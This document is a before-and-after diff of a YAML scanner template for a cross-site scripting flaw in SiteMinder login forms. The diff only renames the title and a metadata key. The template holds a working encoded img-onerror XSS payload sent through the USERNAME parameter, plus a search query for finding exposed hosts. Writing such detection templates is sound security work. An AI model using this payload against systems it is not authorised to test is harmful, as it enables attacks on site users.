vulnerabilities/other/siteminder-dom-xss.yaml (before)
id: siteminder-dom-xss

info:
  name: SiteMinder - DOM based XSS
  author: clarkvoss
  severity: medium
  description: SiteMinder DOM Based XSS.
  reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
  metadata:
    verified: true
    google-dork: inurl:"smpwservices.fcc"
  tags: dom,xss,siteminder

requests:
  - method: GET
    path:
      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        words:
          - '\u003d\u0022confirm(document.domain)\u0022\u003e</B> you cannot access your'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

vulnerabilities/other/siteminder-dom-xss.yaml (after)
id: siteminder-dom-xss

info:
  name: SiteMinder - DOM based Cross-Site Scripting
  author: clarkvoss
  severity: medium
  description: SiteMinder DOM Based XSS.
  reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
  metadata:
    verified: true
    google-query: inurl:"smpwservices.fcc"
  tags: dom,xss,siteminder

requests:
  - method: GET
    path:
      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        words:
          - '\u003d\u0022confirm(document.domain)\u0022\u003e</B> you cannot access your'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

vulnerabilities/other/siteminder-dom-xss.yaml (diff)
@@ -1,14 +1,14 @@
 id: siteminder-dom-xss
 
 info:
-  name: SiteMinder - DOM based XSS
+  name: SiteMinder - DOM based Cross-Site Scripting
   author: clarkvoss
   severity: medium
   description: SiteMinder DOM Based XSS.
   reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
   metadata:
     verified: true
-    google-dork: inurl:"smpwservices.fcc"
+    google-query: inurl:"smpwservices.fcc"
   tags: dom,xss,siteminder
 
 requests:
